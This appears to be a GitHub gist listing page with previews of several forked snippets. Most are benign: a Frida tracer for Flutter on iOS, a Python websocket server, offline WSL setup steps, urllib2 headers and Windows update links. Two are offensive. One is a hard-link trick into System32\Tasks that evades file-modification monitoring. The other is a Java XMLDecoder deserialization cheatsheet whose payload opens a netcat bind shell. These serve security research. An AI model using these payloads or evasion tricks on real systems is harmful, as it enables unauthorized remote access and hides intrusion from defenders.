@AmesianX
AmesianX / Update_Notes.md
Created March 23, 2021 21:40 — forked from mgeeky/Update_Notes.md
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for file modifications in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@AmesianX
AmesianX / java-XMLDecoder-RCE.md
Created March 23, 2021 21:38 — forked from mgeeky/java-XMLDecoder-RCE.md
Java Beans XMLDecoder XML-deserialization Remote Code Execution payloads

Java Beans XMLDecoder Remote Code Execution cheatsheet

Given a file-upload feature, or any other function that parses XML input which later flows through the XMLDecoder component of Java Beans, one could try to play with its known deserialization issue. Testing that issue requires a specially crafted XML payload that invokes arbitrary Java interfaces and methods with supplied parameters.

Payloads

To start a bind shell on the target machine, one could use a payload like the following:

Runtime.getRuntime().exec(new java.lang.String[]{"/usr/bin/nc", "-l", "-p", "4444", "-e", "/bin/bash"});
@AmesianX
AmesianX / flutter_ios.js
Created December 30, 2020 13:36 — forked from AICDEV/flutter_ios.js
Frida trace Flutter Functions on iOS
/**
* attach the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
* start the app directly with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
*/
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
@AmesianX
AmesianX / PythonSimpleWebsocket
Created September 20, 2020 20:31 — forked from rich20bb/PythonSimpleWebsocket
Simple websocket server in Python. Echoes back whatever is received. Works with Chrome, Firefox 16, IE 10.
import time
import struct
import socket
import hashlib
import base64
import sys
from select import select
import re
import logging
from threading import Thread
@AmesianX
AmesianX / offline_wsl.md
Created January 24, 2020 00:42
install ubuntu on windows offline

How To:

Download from Microsoft https://wsldownload.azureedge.net/16.04.2-server-cloudimg-amd64-root.tar.gz

or Ubuntu https://cloud-images.ubuntu.com/xenial/current/xenial-server-cloudimg-amd64-root.tar.gz

  • First enable Windows Subsystem for Linux from Program and Features -> Turn Windows features on or off
  • Restart Windows (MS has a thing for rebooting)
  • Download one of the images and host it on your local web server if not done already
  • Start Fiddler and enable Automatic Breakpoints (Alt+F11)
  • Start command prompt and run lxrun /install /y
@AmesianX
AmesianX / Python urllib2.urlopen like Chrome
Created October 21, 2019 17:30 — forked from rafaelhdr/Python urllib2.urlopen like Chrome
Make a urlopen on Python with headers like Chrome
import urllib2
link = "http://example.com"
r = urllib2.Request(url=link)
# r.add_header('Cookie', 'sessionid=13cxrt4uytfc6ijvgeoflmb3u9jmjuhil; csrftoken=jdEKPN8iL62hdaq1hmMuID9DMALiiDIq')
r.add_header('Upgrade-Insecure-Requests', '1')
r.add_header('Accept-Encoding', 'gzip, deflate, sdch, br')
r.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36')
r.add_header('Connection', 'keep-alive')
r.add_header('Cache-Control', 'max-age=0')
Info:
Version 1909 is build 18363.xxx, version 1903 is build 18362.xxx. 1909 is only an "upgrade" over 1903.
The final build string is: 18363.418
KB4509452 (SSU)
- https://uupdump.ml/getfile.php?id=bef818f0-b193-4847-ada2-1beb1e20a014&file=windows10.0-kb4509452-x64.cab
- https://uupdump.ml/getfile.php?id=a9fb4337-43dd-4429-b6d6-82719ddd1be6&file=windows10.0-kb4509452-x86.cab
- https://uupdump.ml/getfile.php?id=389a5e29-0cfd-4f62-b051-54170ccf525d&file=windows10.0-kb4509452-arm64.cab